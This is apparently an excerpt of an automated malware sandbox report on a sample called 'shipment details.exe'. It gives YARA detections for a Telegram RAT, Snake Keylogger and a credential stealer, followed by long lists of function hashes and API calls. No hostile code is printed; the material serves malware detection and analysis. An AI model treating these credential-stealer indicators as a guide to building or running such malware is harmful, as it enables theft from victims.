Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.1%
Total number of Nodes:	98
Total number of Limit Nodes:	11

Executed Functions

Function 05E08BC0 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 0e69f77e966df4869fdf02d14eb0c7a1f580fd9b15583e9abd506ee108aa12ca
Instruction ID: 129b34f887e9c4c34505256f9416ecb69e638fa5be4d3470fab584c9aa51c3c3
Opcode Fuzzy Hash: 0e69f77e966df4869fdf02d14eb0c7a1f580fd9b15583e9abd506ee108aa12ca
Instruction Fuzzy Hash: 7AF16170A04208CFDB14DFA9C948BADBBF2FF44304F15A559E449AB3A6DB74E985CB40

Function 00CFCAB1 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CFCB3E
GetCurrentThread.KERNEL32 ref: 00CFCB7B
GetCurrentProcess.KERNEL32 ref: 00CFCBB8
GetCurrentThreadId.KERNEL32 ref: 00CFCC11

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1a5014b8ee7425017c90ad4cff6d3cad65544b76b106087fc02588f762420518
Instruction ID: d7e8f7f31b6d8ad4cedb2cd926583d45b26a9bedb220c5a6cac0bd70e1cd4aeb
Opcode Fuzzy Hash: 1a5014b8ee7425017c90ad4cff6d3cad65544b76b106087fc02588f762420518
Instruction Fuzzy Hash: 555186B0A003498FDB04DFA9D688BEEBFF1EF49300F248499E118A7260D7749944CF66

Function 00CFCAC0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CFCB3E
GetCurrentThread.KERNEL32 ref: 00CFCB7B
GetCurrentProcess.KERNEL32 ref: 00CFCBB8
GetCurrentThreadId.KERNEL32 ref: 00CFCC11

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 27052f382e541d582069bace5e2666a4124cc6578cee77640481c680d454941d
Instruction ID: 4266cf26aafd7cab13ae65d31d2ea74f601e9a0bc2f79d720c227b4b3cde9b91
Opcode Fuzzy Hash: 27052f382e541d582069bace5e2666a4124cc6578cee77640481c680d454941d
Instruction Fuzzy Hash: 8F5177B0A003498FDB44DFAAD688BAEBBF5EF49304F208459E119A7360D7749944CF66

Function 00CFA428 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CFA67E

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 469605787eafd699950a0e3b3e48e5693a65994ea2c82c8895dbd1a13db4fc1a
Instruction ID: 63d367f27bb3c4ffc0187cb85a6124caff25c3ccbcbc127aade0741abda200cb
Opcode Fuzzy Hash: 469605787eafd699950a0e3b3e48e5693a65994ea2c82c8895dbd1a13db4fc1a
Instruction Fuzzy Hash: 847146B0A00B098FDB64DF29D04576ABBF5FF88300F00892ED59AD7A50D774E949CB92

Function 05E06182 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000050), ref: 05E0613B

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 838df53bcb1ca297bf80d430b487604fdc0950fd31304bd0dbfbed02f4af500e
Instruction ID: 4a236e88a803c1d09045716a9de43d54d8c085ba8577dc290dffbd0cd70f62bb
Opcode Fuzzy Hash: 838df53bcb1ca297bf80d430b487604fdc0950fd31304bd0dbfbed02f4af500e
Instruction Fuzzy Hash: 39411F366002008FCB04EF68D545B6AB7F6FF84310F449468E58ADB3A5CB30EC59CB90

Function 00CFCD00 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CFCD8F

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cb4fed948e687d82a8b3f304c4f50c2e998b48d57f3507e47a767c8bae0459d2
Instruction ID: d90e0f4fbc5af4317e715e35ab4efc45c437ec4ffa4e8c5cdc897e2b6c08ea2f
Opcode Fuzzy Hash: cb4fed948e687d82a8b3f304c4f50c2e998b48d57f3507e47a767c8bae0459d2
Instruction Fuzzy Hash: D921E3B5D002089FDB10CFA9D584AEEBFF9EF48310F14841AE918A3350D379AA44CFA1

Function 00CFCD08 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CFCD8F

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 510deadf1788e7aa9bba99706442392cfef2d61a0f7cc0bee504aa956d7ef1fd
Instruction ID: 6a4a926c2e6451709639b735839cd704c3c4cc1bbe33bb1d48e42b84f9676961
Opcode Fuzzy Hash: 510deadf1788e7aa9bba99706442392cfef2d61a0f7cc0bee504aa956d7ef1fd
Instruction Fuzzy Hash: 3121C4B5D002489FDB10CF9AD584AEEBFF9FB48310F14841AE918A3350D379A944CFA5

Function 05E06F70 Relevance: 1.6, APIs: 1, Instructions: 55
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05E08DA2,00000000,00000000,03AD41A0,02B1BE98), ref: 05E091F0

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: b890f10f5cdf18b90aa37f71a489e115426a60915d9cab7cac75118b4fec5bb5
Instruction ID: 124d7e2b4aa8be37032923838092bb500c79f7ab952615e340861d39b1abf1db
Opcode Fuzzy Hash: b890f10f5cdf18b90aa37f71a489e115426a60915d9cab7cac75118b4fec5bb5
Instruction Fuzzy Hash: F71117B18003499FDB10CF9AD544BDEBBF8FB48310F108469E558A3241C378A944CFA1

Function 05E09180 Relevance: 1.6, APIs: 1, Instructions: 53
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05E08DA2,00000000,00000000,03AD41A0,02B1BE98), ref: 05E091F0

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 301f43911457e60ef95514a61539151ff4b989bf3885bab26e4ab4221a2c4548
Instruction ID: 0a6705f01998178fa5c298cf25cb6744f4d2178b9e39fe9c4ca766e198486c92
Opcode Fuzzy Hash: 301f43911457e60ef95514a61539151ff4b989bf3885bab26e4ab4221a2c4548
Instruction Fuzzy Hash: 5A1107B5D00249DFDB10CF9AD544BEEBBF9FB48314F10842AE558A3251C378A944CFA5

Function 00CFA618 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CFA67E

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f0ac18bbdd65732e56fdc22ff31dd41698435db3580c3e767933238629bd157c
Instruction ID: e4c55872a860c7e78e574add7f2f4d49d7e81133394e96df8fa538645dbbbf62
Opcode Fuzzy Hash: f0ac18bbdd65732e56fdc22ff31dd41698435db3580c3e767933238629bd157c
Instruction Fuzzy Hash: 651110B5C003498FCB14CF9AC444ADEFBF9EF88314F14842AD528A7210C379A645CFA6

Function 05E087EC Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E08EE7), ref: 05E09985

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2e49397d35f3bf8171d1c8ec2eb7c208a4d4da318c09a479864af134dc450a9c
Instruction ID: ef406d3a81719ea1a8634cf36689ca98f048b689ea7b73c732ce7793dc59d1e2
Opcode Fuzzy Hash: 2e49397d35f3bf8171d1c8ec2eb7c208a4d4da318c09a479864af134dc450a9c
Instruction Fuzzy Hash: D3112EB0C047488FCB20DF9AD448BDEFBF8EB48314F10846AE458A3241D379A544CFA5

Function 05E09920 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E08EE7), ref: 05E09985

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 0549ae51762be9ba5ee12a008b5b9ea41e201574c40b7c13dd56567b88f22192
Instruction ID: 2b6e46ebb06008d709f02adcabec05039525ac695ca8203e2ccbe2701cba41f3
Opcode Fuzzy Hash: 0549ae51762be9ba5ee12a008b5b9ea41e201574c40b7c13dd56567b88f22192
Instruction Fuzzy Hash: 151122B5C002488FCB20DF9AD444BDEFBF4EB48314F10845AE458A3241C379A544CFA5

Function 05E01312 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 05E0136D

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ad2a9ae699f44f90a4b45ca1e37f9c326babf82466043d0e646f5bdc079f1c2d
Instruction ID: 6ffa780d10353bb3b538e3789f38e3dc005809a32fff72d45063630cffe63687
Opcode Fuzzy Hash: ad2a9ae699f44f90a4b45ca1e37f9c326babf82466043d0e646f5bdc079f1c2d
Instruction Fuzzy Hash: E81112B5C003488FCB20DF9AD949B9EBBF8EB48324F20845AD558A7340C379A584CFA5

Function 05E01318 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 05E0136D

Memory Dump Source

Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cb46ef9b18adde18b490a05f13cf21ce37498d26e9d80d79ea9458560c675fd5
Instruction ID: 174db7006409c2fc914da8fd417f6ee8a6479dd7123c9134528fa35819100262
Opcode Fuzzy Hash: cb46ef9b18adde18b490a05f13cf21ce37498d26e9d80d79ea9458560c675fd5
Instruction Fuzzy Hash: 181112B1C003488FCB20DF9AD548B9EBBF8EB48324F208459D558A7240C379A584CFA5

Function 00CAD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9c7a77876f7c6a912d1971a51db7e5164d5c732371d4681f819a7aac559bc3
Instruction ID: e4560d9b8d7a6772098eb5752df8b6097ee4671fae2fcf6e602522a353b5e87b
Opcode Fuzzy Hash: dd9c7a77876f7c6a912d1971a51db7e5164d5c732371d4681f819a7aac559bc3
Instruction Fuzzy Hash: 4621F271604205DFCB14DF24D9C4B26BF65FB89318F20C569E94B4B696C33AD807CA62

Function 00CAD2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15334f840bd0a53cda8a80f4b21494b7f2fbba8fcc99d6d577249edf08ebdf72
Instruction ID: ed6882f2b91142fc57e0eb19857dfb1b17f3f206113e08b1ebbc01552bed3c0d
Opcode Fuzzy Hash: 15334f840bd0a53cda8a80f4b21494b7f2fbba8fcc99d6d577249edf08ebdf72
Instruction Fuzzy Hash: 30213871504205DFDF00DF14D9C4B2ABF75FB95328F24C569E94B0B651C33AD846CAA2

Function 00CAD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcedfef530252ad162394041ac3712d858f290e697791c263d186655efb4ff60
Instruction ID: d0cc208c91d0600a129be518fa982881806770f294ca815bb6d2a14f86c67351
Opcode Fuzzy Hash: fcedfef530252ad162394041ac3712d858f290e697791c263d186655efb4ff60
Instruction Fuzzy Hash: 532165755093C08FDB12CF24D594715BF71EB46314F28C5DAD84A8F6A7C33A990ACB62

Function 00CAD2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
Instruction ID: 886625023ecdfe8bba39b85a373e3b164c579c095de2ba5eb7b35c4f4ebebdf1
Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
Instruction Fuzzy Hash: 8E11B275505280CFDB12CF14D5C4B1AFF71FB85328F24C6A9D84A4BA56C33AD94ACBA2

Non-executed Functions

Function 00CFF498 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f2d67fbbb1a1f7a772992ca6a939cfe2359fdbbbedc684c7a5f687a77227fb
Instruction ID: 799cb12646e16413673957238b5b4bb984cf76252c6622744e4d7ceeb0be00ea
Opcode Fuzzy Hash: 22f2d67fbbb1a1f7a772992ca6a939cfe2359fdbbbedc684c7a5f687a77227fb
Instruction Fuzzy Hash: 2B12C6B0C89745CAE390CF25E94C2A93BB1FB81318FD64A09C9651F2E4DBB4156ECF44

Function 00CFE5A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca30622a452d96236c65c3c06d806df2996f26183c121effe68ccc91c169c8f
Instruction ID: 6ff521e0110ef8d9394767b07c767c6cb42deb38b077c2da61d3ea32be3acc3a
Opcode Fuzzy Hash: 9ca30622a452d96236c65c3c06d806df2996f26183c121effe68ccc91c169c8f
Instruction Fuzzy Hash: 35A17C32E0021D8FCF45DFB5D8845AEB7B2FF84300B15856AFA15AB265DB31E915CB41

Analysis Process: shipment details.exePID: 4788, Parent PID: 5564COMMON

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	19%
Total number of Nodes:	42
Total number of Limit Nodes:	6

Executed Functions

Function 013329EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 01332BA4
Xaq, xrefs: 01332A9E
Xaq, xrefs: 01332AD8
Xaq, xrefs: 01332B57

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 56bd674910cfbd0b892d815325aa43b2d99fa2d2606f000186c3fb73817ede6e
Instruction ID: 5b664e6b2d48b0e5db82cc9bde8d85ff9432a4abb818522a9169094afa038b4a
Opcode Fuzzy Hash: 56bd674910cfbd0b892d815325aa43b2d99fa2d2606f000186c3fb73817ede6e
Instruction Fuzzy Hash: 3202AF319147A48FCBA2CF38C5D0757BBB1FF4A318B5488EDC4429B926D775A801DB86

Function 01337118 Relevance: 5.3, Strings: 4, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 01337212
(o]q, xrefs: 01337220
,aq, xrefs: 0133728A
,aq, xrefs: 01337298

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq
API String ID: 0-1947289240
Opcode ID: 96f56f549978a684d7c9a412ac4d42de5508cde65d666e1c9201035937ac4459
Instruction ID: 8f06ef2db4ffa298e1e7fa5c9d9746f825cbf50ab95ab3e6ef3a231d3288d6e6
Opcode Fuzzy Hash: 96f56f549978a684d7c9a412ac4d42de5508cde65d666e1c9201035937ac4459
Instruction Fuzzy Hash: F5E13DB1A00119CFDB15CFA9C884AADBBF6BF88318F558455E905EB3A1D734EC41CB94

Function 0133A088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON

Download Yara Rule

Strings

4']q, xrefs: 0133AB13
(o]q, xrefs: 0133A518

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: f8a9ae60d1a8270efbbe33bf54fb2814296915c036f05393e094b2e90927d815
Instruction ID: 84d8c17115233b86b9393f34c2ad7099dada70940934469ec7fa09ce6e0d5f42
Opcode Fuzzy Hash: f8a9ae60d1a8270efbbe33bf54fb2814296915c036f05393e094b2e90927d815
Instruction Fuzzy Hash: E1828C31A00209DFDB15CFA8C984AAEBBF6FF88318F158959E545DB3A2D731E841CB54

Function 013369A0 Relevance: 3.0, Strings: 2, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 01336EDA
Haq, xrefs: 01336DA6

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: de2ff74711ba1c82abdbef46eafd2b325428e3d6052ea5ef05472dff7807ab69
Instruction ID: ee2294cb7655d5c095668c4d79f8beae8c30f8f6f8c698a77d2e5e80a29f1ba9
Opcode Fuzzy Hash: de2ff74711ba1c82abdbef46eafd2b325428e3d6052ea5ef05472dff7807ab69
Instruction Fuzzy Hash: 7412ADB0A002199FDB14DF69C844AAEBBF6FFC8304F108529E906DB395DB349D46CB94

Function 0133C147 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0133C3EF
PH]q, xrefs: 0133C400

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 4ca78c4f7e1573d659146a2d5aaee2d1a17c69f4bd103d57c6e7bfe52e212ba8
Instruction ID: 211994594674d57175c51fdbeb3adf5314ae42e83a84792e1d995c74204e3d69
Opcode Fuzzy Hash: 4ca78c4f7e1573d659146a2d5aaee2d1a17c69f4bd103d57c6e7bfe52e212ba8
Instruction Fuzzy Hash: C2A1F474E00258CFDB14DFAAD884A9DBBF2BF89314F14906AE508EB365DB349942CF54

Function 01335362 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 013355D9
PH]q, xrefs: 013355C8

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: af6cfaa913c884e820baf51279d788829c199ea18ec1eeb8ffd19ea111ea4bbf
Instruction ID: 94b6cbbe6661e2fa7514c0381ed36e8513ec001ed7f59e0bb899135fd8ecbd03
Opcode Fuzzy Hash: af6cfaa913c884e820baf51279d788829c199ea18ec1eeb8ffd19ea111ea4bbf
Instruction Fuzzy Hash: 4C91D574E00258CFDB18DFAAD984A9DBBF2BF89304F14C069E409AB365DB349945CF54

Function 0133C468 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0133C6D0
PH]q, xrefs: 0133C6BF

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 723d808053b4a8dba8ec919e68e3a488c27b377ff45399f68c8ff441d242aa20
Instruction ID: 4ab59c1544a8807b556f29be5bc7dda44d4d3f3e6760dfd8cc1da3c531db67ab
Opcode Fuzzy Hash: 723d808053b4a8dba8ec919e68e3a488c27b377ff45399f68c8ff441d242aa20
Instruction Fuzzy Hash: F681C574E00218CFEB14DFAAD984A9DBBF2BF88314F14D06AE419AB365DB349941CF54

Function 0133CA08 Relevance: 2.7, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0133CC70
PH]q, xrefs: 0133CC5F

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: d35d9287f13d9a35504cca0d1b315b8772c4aa2b5270fd7f1c1ffd8cfae1e94f
Instruction ID: e7438fd01221ba8f07c4288c6842eca30edba0b79bc3ed1e3ebeb2304ca1e4e2
Opcode Fuzzy Hash: d35d9287f13d9a35504cca0d1b315b8772c4aa2b5270fd7f1c1ffd8cfae1e94f
Instruction Fuzzy Hash: C581B474E00218CFDB18DFAAD984A9DBBF2BF88304F14D06AE419AB365DB349945CF54

Function 0133D278 Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0133D4E0
PH]q, xrefs: 0133D4CF

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: f0d035ddccc6b98d04c499e0026b8fa6ed7779de10b635b259efa00ad00697e8
Instruction ID: d324f5e991381952cbabe8a99bc6d27e95c56c91fe58c701a291bf36d75a15b5
Opcode Fuzzy Hash: f0d035ddccc6b98d04c499e0026b8fa6ed7779de10b635b259efa00ad00697e8
Instruction Fuzzy Hash: 5581D374E00218CFDB18DFAAD984A9DBBF2BF88304F54C069E419AB365DB349945CF54

Function 0133C738 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0133C9A0
PH]q, xrefs: 0133C98F

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 97f9f569635f33fbc63ac3737c49656c9b653f12b71c522de9ace923833d0287
Instruction ID: eaf72e13413095e3ebf341a9ef8678b83036c9167d54d42df5533e5b1b0ef9e4
Opcode Fuzzy Hash: 97f9f569635f33fbc63ac3737c49656c9b653f12b71c522de9ace923833d0287
Instruction Fuzzy Hash: EA81B374E00218CFDB18DFAAD984A9DBBF2BF88314F14D06AE418AB365DB309945CF54

